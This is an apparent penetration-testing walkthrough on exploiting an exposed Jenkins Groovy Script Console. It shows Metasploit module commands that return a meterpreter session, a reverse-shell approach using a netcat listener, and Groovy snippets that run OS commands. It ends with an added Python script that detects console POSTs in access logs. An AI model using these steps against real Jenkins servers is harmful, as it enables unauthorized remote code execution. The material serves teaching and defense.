
There were many possible ways to exploit Jenkins; however, we were interested in
the Script Console, because Jenkins ships a Groovy script console that lets anyone
who can reach it run arbitrary Groovy scripts inside the Jenkins master runtime.

Table of Contents
Jenkins Groovy Script Console
Exploit Groovy Script Console using Metasploit
revsh.groovy
Groovy executing shell commands -I
Groovy executing shell commands -II
Jenkins Groovy Script Console
Jenkins features a nice Groovy script console which allows one to run arbitrary
Groovy scripts within the Jenkins master runtime or in the runtime on agents. It is
a web-based Groovy shell into the Jenkins runtime. Groovy is a very powerful
language which offers the ability to do practically anything Java can do including:

Create sub-processes and execute arbitrary commands on the Jenkins master and
agents.
Read any file on the host to which the Jenkins master has access
(like /etc/passwd).
Decrypt credentials configured within Jenkins.
Granting a normal Jenkins user Script Console Access is essentially the same as
giving them Administrator rights within Jenkins.
Source: https://wiki.jenkins-ci.org/display/JENKINS/Jenkins+Script+Console

Exploit Groovy Script Console using Metasploit

This module uses the Jenkins-CI Groovy script console to execute OS commands using
Java.

use exploit/multi/http/jenkins_script_console
msf exploit(jenkins_script_console) > set rhost 192.168.1.106
msf exploit(jenkins_script_console) > set rport 8484
msf exploit(jenkins_script_console) > set targeturi /
msf exploit(jenkins_script_console) > set target 0
msf exploit(jenkins_script_console) > exploit
Metasploit uses a command stager to deliver its payload through the command
injection.

Hence, as you can observe, it has returned a meterpreter session on the victim's
machine.

revsh.groovy
Suppose you find a Jenkins instance with no login password, or you are a normal
user who has permission to access the script console: you can then use this
privilege to get a reverse shell from the machine. At the Jenkins Dashboard, go to
Manage Jenkins and then select Script Console.

At the script console you have full privilege to run any program code, so I tried
to execute the following piece of code, which I had taken from GitHub, to get a
reverse connection back to my local machine via a netcat listener.

nc -lvp 1234
Once the above script is executed, it gives a netcat session on the victim's
machine.

Groovy executing shell commands -I

Similarly, with the help of the following piece of code, which I found here, I
tried to get RCE by executing an OS command through the Groovy script console.

// buffers that will collect the child process's stdout and stderr
def sout = new StringBuffer(), serr = new StringBuffer()
// Groovy's String.execute() spawns the command as a sub-process of the Jenkins JVM
def proc = 'ipconfig'.execute()
// drain both streams asynchronously so the process cannot block on a full pipe
proc.consumeProcessOutput(sout, serr)
// wait up to one second, then kill the process if it has not finished
proc.waitForOrKill(1000)
println "out> $sout err> $serr"
Once you run the script, it executes the command given inside the code. You can
observe the result, where we have fetched the network configuration via the
ipconfig command.

Groovy executing shell commands -II

Similarly, I found another very small piece of code, from here, to exploit the
Groovy Console; it gives RCE and executes the shell command.

// spawn cmd.exe as a sub-process of the Jenkins JVM
def cmd = "cmd.exe /c dir".execute();
// Process.text blocks until the process exits and returns its full stdout
println("${cmd.text}");
Again, once you run the script, it executes the command given inside the code. You
can observe the result, where we have fetched the directory listing via the dir
command.
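Every snippet in this walkthrough (the Metasploit module and both Groovy one-liners alike) reaches the master the same way: a POST to the /script form, to its form-less counterpart /scriptText, or to /computer/<node>/script for an agent. The defender's side of the story is therefore to watch for those POSTs in the Jenkins access log. The following Python script is an added example, not code from the original post or from the Jenkins project: it parses a few constructed combined-format access-log lines (the shape Winstone's access logger produces when it is enabled; if a reverse proxy fronts Jenkins, adjust the regex to its format) and reports console executions, distinguishing attempts Jenkins accepted from ones it denied. The log lines, timestamps and client addresses are made up for the example.

```python
import re
from collections import Counter
from dataclasses import dataclass

# Assumption: Jenkins runs with Winstone's NCSA access logger enabled, which
# writes one combined-format line per request; adjust LOG_RE if a reverse
# proxy in front of Jenkins logs in a different shape.
LOG_RE = re.compile(
    r'^(?P<ip>\S+) \S+ (?P<user>\S+) \[(?P<ts>[^\]]+)\] '
    r'"(?P<method>[A-Z]+) (?P<path>\S+) [^"]*" (?P<status>\d{3}) \S+'
)

# Paths through which Groovy reaches the master or an agent runtime:
# /script (the web form), /scriptText (the form-less variant used by CLI
# tools) and /computer/<node>/script (the per-agent console). Paths such as
# /scriptApproval/... are deliberately not matched.
CONSOLE_PATH = re.compile(r'(?:^|/)(?:script|scriptText)(?:$|[/?])')


@dataclass
class Finding:
    ip: str
    user: str
    ts: str
    path: str
    status: int


def parse_line(line):
    """Return the fields of one access-log line, or None if it does not parse."""
    m = LOG_RE.match(line)
    return m.groupdict() if m else None


def find_console_executions(lines):
    """Every POST to a script-console endpoint, whether Jenkins accepted it or not.

    A GET only renders the form; the script is submitted by POST, so only POSTs
    count as execution attempts. Denied attempts (403) are kept because a user
    probing for the console is itself worth knowing about.
    """
    findings = []
    for line in lines:
        rec = parse_line(line)
        if rec is None or rec["method"] != "POST":
            continue
        path = rec["path"].split("?", 1)[0]
        if not CONSOLE_PATH.search(path):
            continue
        findings.append(
            Finding(rec["ip"], rec["user"], rec["ts"], rec["path"], int(rec["status"]))
        )
    return findings


def successful_executions(lines):
    """Only the attempts Jenkins accepted (2xx/3xx), i.e. scripts that actually ran."""
    return [f for f in find_console_executions(lines) if 200 <= f.status < 400]


def count_by_source(lines):
    """Attempts per client address; a burst from one address suggests a tool, not a person."""
    return dict(Counter(f.ip for f in find_console_executions(lines)))


# Constructed sample log: not captured from a real server.
SAMPLE_LOG = """\
192.168.1.50 - - [12/Mar/2023:10:01:02 +0000] "GET /job/build/lastBuild/console HTTP/1.1" 200 5120 "-" "Mozilla/5.0"
192.168.1.50 - - [12/Mar/2023:10:02:15 +0000] "GET /script HTTP/1.1" 200 8731 "-" "Mozilla/5.0"
192.168.1.50 - - [12/Mar/2023:10:02:40 +0000] "POST /script HTTP/1.1" 200 9120 "http://192.168.1.106:8484/script" "Mozilla/5.0"
10.0.0.7 - - [12/Mar/2023:10:05:01 +0000] "POST /scriptText HTTP/1.1" 200 412 "-" "curl/7.88.1"
10.0.0.7 - - [12/Mar/2023:10:05:30 +0000] "POST /computer/agent1/script HTTP/1.1" 200 301 "-" "curl/7.88.1"
192.168.1.22 - - [12/Mar/2023:10:06:00 +0000] "POST /scriptApproval/approveScript HTTP/1.1" 302 0 "-" "Mozilla/5.0"
192.168.1.22 - - [12/Mar/2023:10:06:10 +0000] "POST /scriptText HTTP/1.1" 403 0 "-" "python-requests/2.28"
""".splitlines()


if __name__ == "__main__":
    for f in find_console_executions(SAMPLE_LOG):
        verdict = "executed" if 200 <= f.status < 400 else "denied"
        print(f"{f.ts}  {f.ip:<14} {f.status}  {verdict:<8} {f.path}")
    print("attempts by source:", count_by_source(SAMPLE_LOG))
```

On the sample above the script reports four attempts, three of which Jenkins accepted, and the 403 from 192.168.1.22 shows a client that tried the console without the permission for it. Because the wiki text quoted earlier equates console access with administrator rights, a sensible rule is that any accepted POST to these paths from an account or address that is not a known administrator is an incident, not a curiosity.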
